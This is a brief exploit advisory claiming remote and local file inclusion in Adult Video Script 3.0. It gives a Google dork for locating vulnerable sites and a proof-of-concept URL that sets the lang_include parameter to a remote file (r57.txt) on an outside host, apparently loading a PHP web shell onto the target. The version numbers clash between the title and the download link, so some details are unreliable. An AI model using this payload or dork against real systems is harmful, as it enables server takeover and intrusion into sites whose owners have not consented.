Authored by indoushka

Adult Video Script version 3.0 suffers from local and remote file inclusion vulnerabilities.

====================================================================================================================================
| # Title : Adult Video Script 3.0 RFI /LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Download : https://update.avscms.com/files/avscms-8.2-full.zip |
| # Dork : Powered by AVSCMS |
====================================================================================================================================

P0C :

[+] Dorking İn Google Or Other Search Enggine.

[+] R/L File Inclusion :

Line : 20 = include_once ('./lang/'.$lang_include);
Function : include_once
Variables :$lang_include
C:webwwwuploadsiteadmineditor_filesimage.php

[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
=======================================================================================================================================